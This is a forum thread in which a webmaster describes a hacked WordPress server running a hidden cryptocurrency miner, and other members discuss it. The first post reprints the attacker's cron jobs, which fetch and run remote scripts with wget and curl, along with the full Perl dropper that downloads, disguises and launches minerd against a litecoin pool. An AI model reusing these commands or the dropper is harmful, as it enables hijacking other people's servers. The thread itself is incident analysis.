|
|
|
|
||||
|
Welcome to the GoFuckYourself.com - Adult Webmaster Forum forums. You are currently viewing our boards as a guest which gives you limited access to view most discussions and access our other features. By joining our free community you will have access to post topics, communicate privately with other members (PM), respond to polls, upload content and access many other special features. Registration is fast, simple and absolutely free so please, join our community today! If you have any problems with the registration process or your account login, please contact us. |
 |
|
|||||||
| Discuss what's fucking going on, and which programs are best and worst. One-time "program" announcements from "established" webmasters are allowed. |
|
|
Thread Tools |
06-02-2014, 03:23 PM
|
#1 |
|
see you later, I'm gone
Industry Role:
Join Date: Oct 2002
Posts: 14,110
|
hacking Assholes
So, one of my servers was running at about 400% apparently.
When all was said and done it seems that someone used a WP hack on one of my clients WP installs and then managed to somehow gain shell access to set up 2 cron jobs, one under each of 2 different user accounts. the cron job appears to create an instance of a bitcoin mining operation of some kind. I found it being discussed here: http://serverfault.com/questions/598...-100-cpu-usage This is one of the crons that was created: */6 * * * * cd /tmp;wget http://updates.dyndn-web.com/.../abc.txt;curl -O http://updates.dyndn-web.com/.../abc.txt;perl abc.txt;rm -f abc* */6 * * * * cd /tmp;wget http://updates.dyndn-web.com/.../abc.txt;curl -O http://updates.dyndn-web.com/.../abc.txt;perl abc.txt;rm -f abc* */6 * * * * cd /tmp;wget http://updates.dyndn-web.com/.../abc.txt;curl -O http://updates.dyndn-web.com/.../abc.txt;perl abc.txt;rm -f abc* 10 2 * * * killall -9 /usr/bin/host;cd /tmp;wget http://95.154.227.98/.../libcfg.txt;curl -O http://95.154.227.98/.../libcfg.txt;mv libcfg.txt libcfg.php;php libcfg.php */6 * * * * cd /tmp;wget http://updates.dyndn-web.com/.../abc.txt;curl -O http://updates.dyndn-wendn-web.com/.../abc.txt;perl abc.txt;rm -f abc.txt */6 * * * * cd /tmp;wget http://updates.dyndn-web.com/.../abc.txt;curl -O http://updates.dyndn-wendn-web.com/.../abc.txt;perl abc.txt;rm -f abc.txt */6 * * * * cd /tmp;wget http://updates.dyndn-web.com/.../abc.txt;curl -O http://updates.dyndn-wendn-web.com/.../abc.txt;perl abc.txt;rm -f abc.txt */6 * * * * cd /tmp;wget http://updates.dyndn-web.com/.../abc.txt;curl -O http://updates.dyndn-wendn-web.com/.../abc.txt;perl abc.txt;rm -f abc.txt */6 * * * * cd /tmp;wget http://updates.dyndn-web.com/.../abc.txt;curl -O http://updates.dyndn-wendn-web.com/.../abc.txt;perl abc.txt;rm -f abc.txt */6 * * * * cd /tmp;wget http://updates.dyndn-web.com/.../abc.txt;curl -O http://updates.dyndn-wendn-web.com/.../abc.txt;perl abc.txt;rm -f abc.txt ************************************End of cron And this is the little perl script that they pull in in the abc.txt file: #!/usr/bin/perl system("killall -9 minerd"); system("killall -9 PWNEDa"); system("killall -9 PWNEDb"); system("killall -9 PWNEDc"); system("killall -9 PWNEDd"); system("killall -9 PWNEDe"); system("killall -9 PWNEDg"); system("killall -9 PWNEDm"); system("killall -9 minerd64"); system("killall -9 minerd32"); system("killall -9 named"); $rn=1; $ar=`uname -m`; while($rn==1 || $rn==0) { $rn=int(rand(11)); } $exists=`ls /tmp/.Ice-unix`; $cratch=`ps aux | grep -v grep | grep kernelcfg`; $cratchx=`ps aux | grep -v grep | grep kernelupdates`; if($cratch=~/kernelcfg/gi || $cratchx=~/kernelupdates/gi) { die; } if($exists!~/kernelcfg/gi) { $wig=`wget --version | grep GNU`; if(length($wig)<6) { if($ar=~/64/g) { system("mkdir /tmp;mkdir /tmp/.Ice-unix;cd /tmp/.Ice-unix;wget http://41.215.22.162/64.tar.gz;tar xzvf 64.tar.gz;mv minerd kernelcfg;chmod +x ./kernelcfg"); } else { system("mkdir /tmp;mkdir /tmp/.Ice-unix;cd /tmp/.Ice-unix;wget http://41.215.22.162/32.tar.gz;tar xzvf 32.tar.gz;mv minerd kernelcfg;chmod +x ./kernelcfg"); } } else { if($ar=~/64/g) { system("mkdir /tmp;mkdir /tmp/.Ice-unix;cd /tmp/.Ice-unix;curl -O http://41.215.22.162/64.tar.gz;tar xzvf 64.tar.gz;mv minerd kernelcfg;chmod +x ./kernelcfg"); } else { system("mkdir /tmp;mkdir /tmp/.Ice-unix;cd /tmp/.Ice-unix;curl -O http://41.215.22.162/32.tar.gz;tar xzvf 32.tar.gz;mv minerd kernelcfg;chmod +x ./kernelcfg"); } } } @prts=('8332','9091','1121','7332','6332','1332',' 9333','2961','8382','8332','9091','1121','7332','6 332','1332','9333','2961','8382'); $prt=0; while(length($prt)<4) { $prt=$prts[int(rand(19))-1]; } print "setup for $rn:$prt done :-)\n"; while(1) { $cratch=`ps aux | grep -v grep | grep kernelcfg`; $cratchx=`ps aux | grep -v grep | grep kernelupdates`; if($cratch!~/kernelcfg/gi && $cratch!~/kernelupdates/gi) { system("cd /tmp/.Ice-unix;./kernelcfg -B -o stratum+tcp://hk2.wemineltc.com:80 -u spdrman.".$rn." -p passxxx &"); } sleep(5); } ************************************************** ** I am getting the idea that it is a bitcoin mining thing only because of some of the variable names in there and the discussion I linked to. I have not examined the code at all yet. So, how many coins do you think they managed to do off my little server? I am guessing about .00000000001 BC across the week ;p
__________________
All cookies cleared! |
|
|
|
06-02-2014, 03:33 PM
|
#2 |
|
So Fucking Banned
Industry Role:
Join Date: Mar 2014
Posts: 865
|
Maybe they were doing altcoins?
Or maybe they also attacked eery site on the server (if it's shared). Hate hackers but can't help marvel at what they can do. |
|
|
|
|
06-02-2014, 03:35 PM
|
#3 |
|
OG
Industry Role:
Join Date: May 2002
Posts: 3,308
|
what's up sarettah, long time no chat
__________________
M3server.com VPS>Get your 2nd month free Ded>$100 off your 2nd month since 1996 icq-25135623 dannyh at~m3server DOT com |
|
|
|
|
06-02-2014, 03:52 PM
|
#4 | |
|
see you later, I'm gone
Industry Role:
Join Date: Oct 2002
Posts: 14,110
|
Quote:
See you flying the M3 Button. You back with them? Or never left? Or what? Edited in: See you have an M3 email address so I gues you are there. Were you gone? Fill me in man. Expiring minds need to know ;p And on that note. Just for the record. M3 picked up on the hack for me because of CPU usage. Then we spent most of the afternoon tracking down shit and making sure holes were patched. As always thanks to M3 - Travis, Chris, and Ryan this time - for all the help. .
__________________
All cookies cleared! |
|
|
|
|
|
06-02-2014, 04:31 PM
|
#5 | |
|
OG
Industry Role:
Join Date: May 2002
Posts: 3,308
|
Quote:
do you have ICQ add me, if so, if not, shoot me a email and I'll fill you in 
__________________
M3server.com VPS>Get your 2nd month free Ded>$100 off your 2nd month since 1996 icq-25135623 dannyh at~m3server DOT com |
|
|
|
|
|
06-02-2014, 04:38 PM
|
#6 |
|
Confirmed User
Industry Role:
Join Date: Aug 2004
Location: Barcelona
Posts: 1,022
|
mining litecoin, you can see at the end connecting to litecoin mining pool, wemineltc.com with the worker name "spdrman" some extra characters
|
|
|
|
|
06-02-2014, 05:00 PM
|
#7 |
|
Registered User
Industry Role:
Join Date: Jan 2011
Posts: 84
|
We get attacked an average of 5-12 times per day across the dozens of servers and hundreds of VPS accounts I admin.
In 5 years, we've had 1 compromise which was due to an inside job by someone at a provider who had access to their admin account passwords. It's really not that hard to secure systems. You don't have to be completely paranoid because unless someone is specifically targeting you for attack most hacks are based on lazy ass script fags who look for the easy targets. Ongoing monitoring with alerts via SMS allows you to catch the occasional zero day exploit and stop it before they completely wreck a system.
__________________
-= Software / Systems Architect and Server Geek =- |
|
|
|
|
06-02-2014, 05:13 PM
|
#8 |
|
Registered User
Industry Role:
Join Date: Dec 2013
Posts: 49
|
You can find out who this is by going here:
wemineltc.com Subpeona them for their users info. They should be following KYC laws (Know Your Customer) if they are compliant. The username for their pool member is spdrman and im sure by getting this info you will open a can of worms for that user because you will be able to see every server he/she has hacked in the pool account. The line below configured the username truncated by a . to the worker name and uses any old password because pools typically do not use passwords.... system("cd /tmp/.Ice-unix;./kernelcfg -B -o stratum+tcp://hk2.wemineltc.com:80 -u spdrman.".$rn." -p passxxx &"); |
|
|
|
